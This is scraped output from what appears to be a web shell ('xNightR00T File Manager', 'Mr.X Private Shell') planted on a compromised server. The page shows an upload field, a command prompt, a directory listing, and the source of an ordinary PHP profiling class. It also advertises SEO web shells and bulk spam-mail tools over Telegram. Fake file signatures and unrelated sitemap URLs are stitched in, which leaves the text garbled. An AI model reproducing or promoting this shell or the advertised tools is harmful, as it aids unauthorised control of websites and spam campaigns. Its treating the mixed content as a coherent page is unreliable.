xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
<?php

namespace DevBar;

use DevBar\Data;
use DevBar\Data\InternalFunctionsMapper;
use Zend\Di\ServiceLocator;

class FunctionStatsContainer
{
    /**
     * @var array
     */
    protected $functionStats;

    /**
     * @var array;
     */
    private static $internalFunctions = null;
    private static $internalClasses   = null;

    /**
     * @param array $eventsGroup
     */
    public function __construct(array $functionStats, $key = null)
    {
        $this->functionStats = $functionStats;
    }

    public function toArray()
    {
        return $this->functionStats;
    }

    /**
     * @return integer
     */
    public function getId()
    {
        return (isset($this->functionStats['id']) ? $this->functionStats['id'] : '');
    }

    /**
     * @return integer
     */
    public function getRequestId()
    {
        return (isset($this->functionStats['request_id']) ? $this->functionStats['request_id'] : '');
    }

    /**
     * @return string
     */
    public function getFunctionName()
    {
        return (isset($this->functionStats['function_name']) ? $this->functionStats['function_name'] : '');
    }

    /**
     * @return string
     */
    public function getFunctionScope()
    {
        return (isset($this->functionStats['function_scope']) ? $this->functionStats['function_scope'] : '');
    }

    /**
     * @return integer
     */
    public function getTimesCalled()
    {
        return (isset($this->functionStats['times_called']) ? $this->functionStats['times_called'] : '');
    }

    /**
     * @return integer
     */
    public function getTimeExclusive()
    {
        return (isset($this->functionStats['time_exclusive']) ? $this->functionStats['time_exclusive'] : '');
    }

    /**
     * @return integer
     */
    public function getTimeInclusive()
    {
        return (isset($this->functionStats['time_inclusive']) ? $this->functionStats['time_inclusive'] : '');
    }

    /**
     * @return string
     */
    public function getFilename()
    {
        return (isset($this->functionStats['filename']) ? $this->functionStats['filename'] : '');
    }

    /**
     * @return integer
     */
    public function getLine()
    {
        return (isset($this->functionStats['line']) ? $this->functionStats['line'] : '');
    }

    /**
     * @return integer
     */
    public function getIsInternal()
    {
        // get internal functions and classes
        $internalFunctionsMapper = null;
        if (is_null(self::$internalFunctions) || is_null(self::$internalClasses)) {
            $internalFunctionsMapper = new InternalFunctionsMapper();
            self::$internalFunctions = $internalFunctionsMapper->getInternalFunctions();
            self::$internalClasses   = $internalFunctionsMapper->getInternalClasses();
        }

        // get scope and function name
        $scope        = $this->getFunctionScope();
        $functionName = str_replace(array('(', ')'), '', $this->functionStats['function_name']);

        // check if internal
        if (!empty($scope) && in_array($scope, self::$internalClasses)) return 1;
        if (empty($scope) && in_array($functionName, self::$internalFunctions)) return 1;
        return 0;
    }
}

Filemanager

Name Type Size Permission Actions
Controller Folder 0755
Data Folder 0755
Db Folder 0755
Filter Folder 0755
Forms Folder 0755
Listener Folder 0755
ModuleManager Folder 0755
Producer Folder 0755
Validator Folder 0755
View Folder 0755
AccessTokenContainer.php File 2.04 KB 0644
BacktraceContainer.php File 676 B 0644
ExceptionsContainer.php File 1.75 KB 0644
ExtensionContainer.php File 1.2 KB 0644
FunctionStatsContainer.php File 3.14 KB 0644
LogEntryContainer.php File 2.12 KB 0644
MonitorEventsContainer.php File 909 B 0644
RequestContainer.php File 4.3 KB 0644
RuntimeContainer.php File 1.28 KB 0644
SqlQueryContainer.php File 2.94 KB 0644
SuperGlobalContainer.php File 839 B 0644
ZRayModule.php File 5.19 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml